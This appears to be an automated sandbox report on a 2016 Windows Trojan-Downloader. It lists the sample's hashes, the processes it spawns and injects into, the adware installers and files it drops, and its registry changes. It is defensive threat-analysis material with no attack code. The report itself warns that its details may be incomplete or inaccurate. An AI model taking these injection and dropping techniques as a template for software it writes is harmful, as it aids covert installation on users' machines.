Trojan-Downloader.Win32.Moure_19c284e552

by malwarelabrobot on June 21st, 2016 in Malware Descriptions.

not-a-virus:AdWare.Win32.Vopak.aoun (Kaspersky), Trojan-Downloader.Win32.Moure.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.IEDummy.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 19c284e5520c58d4087fd8a6f94bb3fb
SHA1: c7ab9794633160a80fb137a4c3cbc5de02489366
SHA256: c79dfb4a108481b2e0ad7b8afa7ea77ae8231d76b3f588ee9ab4b0f2913c2346
SSDeep: 3072:AgXdZt9P6D3XJ0M08Focw6nE0Wpq6xD4DfmfHJO9o4sL:Ae34nFF1w6EzsaHJks
Size: 134224 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan-Downloader creates the following process(es):

nss15.tmp:2748
nss15.tmp:2668
HY2F7WRL5V.exe:568
AutoTime_51477.exe:4032
win.exe:484
AutoTime_51477.tmp:4080
nsl1E.tmp:2172
idscservice.exe:1368
nsjB.tmp:1568
%original file name%.exe:1756
nsk1B.tmp:2824
nsk1B.tmp:3456
nsk1B.tmp:3440
nsk1B.tmp:2856
nsb10.tmp:2136
qnsm13.tmp:2596
qnsm13.tmp:2588
testversion.exe:820
osmsg.exe:2332
regsvr32.exe:508
hp.exe:2404
nst25.tmp:3184
mofcomp.exe:2556
nst18.tmp:2976
tiantianwifi.exe:2436

The Trojan-Downloader injects its code into the following process(es):

wizzcaster.exe:664
wizzcaster.exe:1944
idscservice.exe:1920
AutoTime.exe:496
osmsg.exe:2564
nsq6.tmp:1492

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process HY2F7WRL5V.exe:568 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Program Files%\SpaceSoundPro\SpaceSoundPro.dll (37993 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\SpaceSoundPro 1.0\Uninstall.lnk (734 bytes)
%Documents and Settings%\%current user%\Desktop\SpaceSoundPro.lnk (742 bytes)
%Program Files%\SpaceSoundPro\SpaceSoundPro.exe (87303 bytes)
%Program Files%\SpaceSoundPro\silentconfigurator.exe (5215 bytes)
%Program Files%\SpaceSoundPro\silentunconfigurator.exe (3502 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\System.dll (11 bytes)
%Program Files%\SpaceSoundPro\Uninstall.exe (1328 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\NSISpcre.dll (6382 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\AccessControl.dll (13 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\SpaceSoundPro 1.0\SpaceSoundPro.lnk (754 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\NSISpcre.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\AccessControl.dll (0 bytes)

The process AutoTime_51477.exe:4032 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-911CL.tmp\AutoTime_51477.tmp (6356 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-911CL.tmp\AutoTime_51477.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-911CL.tmp (0 bytes)

The process win.exe:484 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Program Files%\Caster\Uninstaller.exe (8008 bytes)
%Program Files%\Caster\wizzcaster.exe (39028 bytes)

The process AutoTime_51477.tmp:4080 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\HelpTool.dll (10815 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\AutoTime.exe (23811 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\_isetup\_RegDLL.tmp (4 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\_isetup\_RegDLL.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\HelpTool.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\AutoTime.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\_isetup (0 bytes)

The process nsl1E.tmp:2172 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\UPUpdata\AutoTime_51477.exe (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ui.dll (70 bytes)

The process idscservice.exe:1920 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\51MTCANOTX\testversion.exe (245098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\51MTCANOTX\win.exe (13484 bytes)
%Program Files%\SpaceSoundPro\config.conf (49 bytes)

The process nsjB.tmp:1568 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\Uninstall.exe (1184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp (37949 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspF.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspF.tmp\KillProcDLL.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\nsb10.tmp (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspF.tmp\WmiInspector.dll (3616 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nszD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspF.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspF.tmp\KillProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\nsb10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspF.tmp\WmiInspector.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspF.tmp (0 bytes)

The process %original file name%.exe:1756 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsuC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk1C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\AutoTime51477[1].exe (56936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\ttwifi[1].exe (74423 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv1D.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa1A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk1B.tmp (74423 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb7.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh16.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmA.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\gXvDHtyh[1].exe (15904 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss15.tmp (347970 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst18.tmp (15904 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh21.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu26.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\vos_n[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2] (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl1E.tmp (56936 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hejie123[1].txt (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\0Be10MR8[1].exe (11960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj24.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp (36408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw14.tmp (15 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq6.tmp (88848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\1znQuZItQ[1] (36408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst25.tmp (11960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\inetc.dll (20 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsuC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq6.tmp (0 bytes)

The process AutoTime.exe:496 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Desktop\AutoTime.lnk (865 bytes)

The process nsk1B.tmp:2824 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-HH7RG.tmp\nsk1B.tmp (6356 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-HH7RG.tmp\nsk1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HH7RG.tmp (0 bytes)

The process nsk1B.tmp:3456 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Program Files%\ttwifi\is-BMP2P.tmp (9036 bytes)
%Program Files%\ttwifi\unins000.dat (2636 bytes)
%Documents and Settings%\All Users\Application Data\WindowsMsg\is-JQUO0.tmp (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\ttwifi\is-IJ1PQ.tmp (14022 bytes)
%Program Files%\ttwifi\is-6H35A.tmp (9098 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ttwifi\ttwifi.lnk (698 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\swapfile.ini (118 bytes)
%Documents and Settings%\All Users\Desktop\ttwifi.lnk (686 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\IDH.dll (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\hp.exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ttwifi\UnInstall.exe.lnk (678 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\_isetup\_RegDLL.tmp (4 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\_isetup\_RegDLL.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\hp.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\IDH.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\_isetup\_shfoldr.dll (0 bytes)

The process nsk1B.tmp:3440 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-HRI4J.tmp\nsk1B.tmp (6356 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-HRI4J.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HRI4J.tmp\nsk1B.tmp (0 bytes)

The process nsk1B.tmp:2856 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-EG1IT.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-EG1IT.tmp\IDH.dll (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-EG1IT.tmp\_isetup\_RegDLL.tmp (4 bytes)
%WinDir%\WindowsUpdate.log (4453 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\swapfile.ini (118 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-EG1IT.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-EG1IT.tmp\_isetup\_RegDLL.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-EG1IT.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-EG1IT.tmp\IDH.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-EG1IT.tmp\_isetup (0 bytes)

The process nsb10.tmp:2136 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\qnsm13.tmp (2660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc12.tmp\WmiInspector.dll (3342 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsc12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\nsm13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc12.tmp\WmiInspector.dll (0 bytes)

The process osmsg.exe:2332 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\swapfile.ini (281 bytes)

The process osmsg.exe:2564 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\icon[1].png (344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\logo[1].png (714 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\zrt_lookup[1].htm (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\jquery-1.8.1[1].js (2983 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\f[3].txt (12397 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\ca-pub-4886776363109745[1].js (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\xu8ohzAYf-_Ky0RDznODng60bK57yvyAAijjGbRhr90[1].js (2737 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\x_button_blue2[1].png (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\CASVWSPU.htm (1685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\f[2].txt (6027 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\f[1].txt (2856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\en[1].png (1184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\randseek[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\googlelogo_color_112x36dp[1].png (1372 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\CAZMOJ7D (12023 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\zrt_lookup[1].html (3332 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\ca-pub-4886776363109745[1].js (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (1399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\f[2].txt (14489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\swapfile.ini (444 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[2].txt (723 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\f[2].txt (3394 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\f[1].txt (9391 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\ad_300_250[1].css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\f[2].txt (5866 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\ad_js[1].js (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\f[1].txt (13580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\6903042196597547844[1].png (30037 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\f[1].txt (8086 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1940 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\common[1].js (1833 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\s[1].htm (143 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\s[1] (145 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\f[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\f[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\f[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\ca-pub-4886776363109745[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\s[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\f[1].txt (0 bytes)

The process hp.exe:2404 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmp.mof (3 bytes)

The process nst25.tmp:3184 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsu28.tmp (7879 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsu27.tmp (0 bytes)

The process nsq6.tmp:1492 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Program Files%\SpaceSoundPro\idscservice.exe (12319 bytes)
%Program Files%\SpaceSoundPro\uninstaller.exe (17064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\HY2F7WRL5V.exe (447582 bytes)
%Program Files%\SpaceSoundPro\wizzcaster.exe (45820 bytes)
%Program Files%\SpaceSoundPro\UninstallerCaster.exe (9708 bytes)

The process mofcomp.exe:2556 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%System%\wbem\Logs\mofcomp.log (1826 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp20.tmp (196 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmp20.tmp (0 bytes)

Registry activity

The process wizzcaster.exe:664 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 9D 1C 71 3A EC D3 8B 2D 95 C1 1E 6B 07 A4 85"

[HKCU\Software\Wizzlabs\Wizzcaster]
"UserName" = "004193207192007144030033089028111014129027067035"
"wizztracki_user_name" = "004193207192007144030033089028111014129027067035"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Wizzlabs\Wizzcaster]
"Install Day" = "1466431553"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Wizzlabs\Wizzcaster]
"wizztracki_api_key" = "117236077146106152003095211195039039240039166134055122027077161063064119122174000100011126175035222105122090001206021058107024144129142209018052"
"api_key" = "203091244096184171062073185162044227126063121253"

[HKCU\Software\Wizzlabs\Wizzcaster\20 06 2016]
"404" = "0"

The process wizzcaster.exe:1944 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 51 10 CD C6 0B 13 52 D3 4D 6A DE 29 E6 2C D7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Wizzlabs\Wizzcaster\20 06 2016]
"404" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process nss15.tmp:2748 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1466354106"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

